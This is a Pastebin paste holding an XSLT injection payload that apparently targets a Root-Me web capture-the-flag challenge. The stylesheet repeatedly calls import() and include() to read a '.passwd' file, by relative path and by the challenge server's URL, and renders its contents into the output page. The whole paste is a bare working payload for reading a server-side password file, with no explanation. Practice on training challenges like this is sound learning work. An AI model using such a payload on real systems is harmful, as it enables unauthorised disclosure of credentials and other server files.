Advertisement
Guest User

Untitled

a guest
Jul 24th, 2017
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  3. <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
  4. <xsl:for-each select="import('.passwd')">
  5. <div style="background-color:teal;color:white;padding:4px">
  6. <xsl:value-of select="/"/>
  7. </div>
  8. </xsl:for-each>
  9.  
  10. <xsl:for-each select="include('http://challenge01.root-me.org/web-serveur/ch50/.passwd')">
  11. <div style="background-color:teal;color:white;padding:4px">
  12. <xsl:value-of select="/"/>
  13. </div>
  14. </xsl:for-each>
  15.  
  16. <xsl:for-each select="include('.passwd')">
  17. <div style="background-color:teal;color:white;padding:4px">
  18. <xsl:value-of select="/"/>
  19. </div>
  20. </xsl:for-each>
  21. </body>
  22. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement